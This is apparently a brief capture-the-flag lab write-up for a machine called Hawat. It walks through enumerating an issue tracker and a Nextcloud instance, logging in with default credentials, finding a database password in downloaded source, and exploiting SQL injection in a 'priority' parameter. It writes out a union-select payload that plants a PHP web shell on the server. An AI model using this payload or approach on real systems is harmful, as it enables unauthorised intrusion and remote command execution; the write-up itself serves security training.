Skip to content

Hawat 🔹

Enumeration

Port 17445 shows a web page of an issue tracker.

We can register users and log in.

Port 30455 shows us a web page with no links.

Using feroxbuster, we find a nextcloud instance.

Trying admin:admin works.

We find the issue tracker project in here.

Download and explore it, and we have the mysql password.

issue_user:ManagementInsideOld797

We can see that the priority parameter is injectable in the checkByPriority function.

So going to the web...

GET is not allowed, so POST? Capture the request with caido.

Changing GET to POST.

And adding the priority parameter, we got to 200.

We saw with feroxbuster that there is a phpinfo that shows that the root path is /srv/http, so we can inject a webshell.

We can inject a web shell:

' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -

Encode with https://www.url-encode-decode.com/

Accessing the path...

Post Exploitation

Get the flag.